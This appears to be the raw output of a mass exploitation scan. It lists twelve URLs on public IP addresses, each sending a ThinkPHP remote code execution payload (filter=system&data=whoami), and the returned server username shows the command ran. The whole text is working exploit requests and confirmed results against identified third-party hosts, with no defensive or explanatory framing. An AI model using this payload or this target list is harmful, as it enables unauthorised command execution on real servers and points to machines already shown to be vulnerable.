http://119.57.115.5:8002/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：nginx
nginx
--------------------------
http://176.122.147.59:8080/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：www
www
--------------------------
http://192.144.147.161:80/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：php-fpm
"php-fpm"
--------------------------
http://172.81.232.33:80/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：apache
apache
--------------------------
http://154.8.221.67:80/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：www
www
--------------------------
http://118.89.54.206:8000/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：www
www
--------------------------
http://118.25.96.213:8000/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：www
www
--------------------------
http://125.77.197.51:80/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：www
www
--------------------------
http://47.100.245.120:81/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：apache
apache
--------------------------
http://116.62.223.180:8082/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：nginx
nginx
--------------------------
http://118.89.22.78:8000/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：www
www
--------------------------
http://119.57.115.5:8002/?s=index%2F%5Cthink%5CRequest/input&filter=system&data=whoami
用户名：nginx
nginx
--------------------------
